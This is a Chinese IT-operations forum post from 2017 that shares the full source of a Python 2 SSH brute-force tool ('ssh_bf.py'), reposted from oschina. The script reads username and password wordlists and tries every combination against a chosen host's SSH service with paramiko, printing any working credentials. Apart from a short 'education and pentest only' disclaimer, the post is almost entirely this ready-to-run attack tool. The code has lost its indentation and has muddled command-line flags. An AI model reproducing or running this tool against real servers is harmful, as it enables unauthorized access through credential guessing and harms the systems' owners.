设为首页 收藏本站
查看: 448|回复: 0

[经验分享] python SSH暴力破解工具

[复制链接]

尚未签到

发表于 2017-4-27 06:55:58 | 显示全部楼层 |阅读模式
  一个暴力破解SSH的Python代码。来自于 oschina
  
DSC0000.jpg
 

#!/usr/bin/env python
#-*-coding = UTF-8-*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng

import sys
import os
import time
#from threading import Thread
try:
from paramiko import SSHClient
from paramiko import AutoAddPolicy
except ImportError:
print G+'''
You need paramiko module.
http://www.lag.net/paramiko/   
Debian/Ubuntu: sudo apt-get install aptitude
: sudo aptitude install python-paramiko\n'''+END
sys.exit(1)
docs =  """
  • This was written for educational purpose and pentest only. Use it at your own risk.
  • Author will be not responsible for any damage!                                                               
  • Toolname        : ssh_bf.py
  • Author          : xfk
  • Version         : v.0.2
  • Example of use  : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
    """

    if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
    else:   
    clearing = 'cls'
    os.system(clearing)

    R = "\033[31m";
    G = "\033[32m";
    Y = "\033[33m"
    END = "\033[0m"

    def logo():
    print G+"\n                |---------------------------------------------------------------|"
    print "                |                                                               |"
    print "                |               blog.sina.com.cn/kaiyongdeng                    |"
    print "                |                16/05/2012 ssh_bf.py v.0.2                     |"
    print "                |                  SSH Brute Forcing Tool                       |"
    print "                |                                                               |"
    print "                |---------------------------------------------------------------|\n"
    print " \n                     [-] %s\n" % time.ctime()
    print docs+END

    def help():
    print Y+"      
  • -H       --hostname/ip       <>the target hostname or ip address"
    print "     
  • -P       --port          <>the ssh service port(default is 22)"
    print "     
  • -U       --usernamelist      <>usernames list file"
    print "     
  • -P       --passwordlist      <>passwords list file"
    print "     
  • -H       --help          <>show help information"
    print "     
  • Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
    sys.exit(1)
    def BruteForce(hostname,port,username,password):
    '''
    Create SSH connection to target
    '''
    ssh = SSHClient()
    ssh.set_missing_host_key_policy(AutoAddPolicy())
    try:
    ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
    status = 'ok'
    ssh.close()
    except Exception, e:
    status = 'error'
    pass
    return status

    def makelist(file):
    '''
    Make usernames and passwords lists
    '''
    items = []
    try:
    fd = open(file, 'r')
    except IOError:
    print R+'unable to read file \'%s\'' % file+END
    pass
    except Exception, e:
    print R+'unknown error'+END
    pass
    for line in fd.readlines():
    item = line.replace('\n', '').replace('\r', '')
    items.append(item)
    fd.close()  
    return items
    def main():
    logo()  
    #   print "hello wold"
    try:   
    for arg in sys.argv:
    if arg.lower() == '-t' or arg.lower() == '--target':
    hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])
    if arg.lower() == '-p' or arg.lower() == '--port':
    port = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-u' or arg.lower() == '--userlist':
    userlist = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-w' or arg.lower() == '--wordlist':
    wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-h' or arg.lower() == '--help':
    help()
    elif len(sys.argv) <= 1:
    help()
    except:
    print R+"[-]Cheak your parametars input\n"+END
    help()
    print G+"\n[!] BruteForcing target ...\n"+END
    #        print "here is ok"
    #        print hostname,port,wordlist,userlist
    usernamelist = makelist(userlist)
    passwordlist = makelist(wordlist)
    print Y+"
  • SSH Brute Force Praparing."
    print "
  • %s user(s) loaded." % str(len(usernamelist))
    print "
  • %s password(s) loaded." % str(len(passwordlist))
    print "
  • Brute Force Is Starting......."+END
    try:
    for username in usernamelist:
    for password in passwordlist:
    print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END
    current = BruteForce(hostname, port, username, password)
    if current == 'error':
    print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END
    #                               pass
    else:
    print G+"\n[+] ^-^ HaHa,We Got It!!!"
    print "[+] username: %s" % username
    print "[+] password: %s\n" % password+END
    #                                   sys.exit(0)
    except:
    print R+"\n[-] There Is Something Wrong,Pleace Cheak It."
    print "[-] Exitting.....\n"+END
    raise
    print Y+"[+] Done.^-^\n"+END
    sys.exit(0)

    if __name__ == "__main__":
    main()

  • 运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
    2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
    3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
    4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
    5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
    6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
    7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
    8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

    所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-369653-1-1.html 上篇帖子: Python Supervisord 进程管理工具 下篇帖子: Lispy: Scheme Interpreter in Python
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    扫码加入运维网微信交流群X

    扫码加入运维网微信交流群

    扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

    扫描微信二维码查看详情

    客服E-mail:kefu@iyunv.com 客服QQ:1061981298


    QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


    提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


    本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



    合作伙伴: 青云cloud

    快速回复 返回顶部 返回列表